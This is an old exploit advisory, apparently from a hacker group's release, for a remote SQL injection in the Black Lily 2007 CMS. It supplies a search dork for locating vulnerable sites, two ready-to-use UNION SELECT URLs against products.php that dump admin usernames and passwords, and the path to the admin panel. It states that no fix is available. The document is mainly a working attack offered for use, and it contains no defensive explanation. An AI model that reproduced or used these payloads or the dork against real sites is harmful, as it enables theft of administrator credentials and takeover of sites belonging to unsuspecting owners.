Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

2007-09-22 00:00:00

#######################SnIper-sa.com################################
# #
# SSSSS nnn nn ii ppppppp eeeeeeeee rrrrr #
# ss nn nn nn ii pp p ee rr rr #
#s nn nn nn ii pp p ee rr r #
# ss nn nn nn ii ppppppp ee rr rr #
# sssss nn nn nn ii pp eeeeee rrrr #
# ss nn nn nn ii pp ee rrrr #
# s nn nn nn ii pp ee rr rr #
# ss nn nnn ii pp ee rr rr #
# sssss nn nnn ii pp eeeeeeeeee rr rr #
# #
#####################VerY-SecReT####################################
####################################

found by :
VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

Dork : "Powered By The Black Lily 2007"
####################################

EXPLOIT:
http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in http://victim.com/xx/admin/

#####################################

S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx : shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : [email protected]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.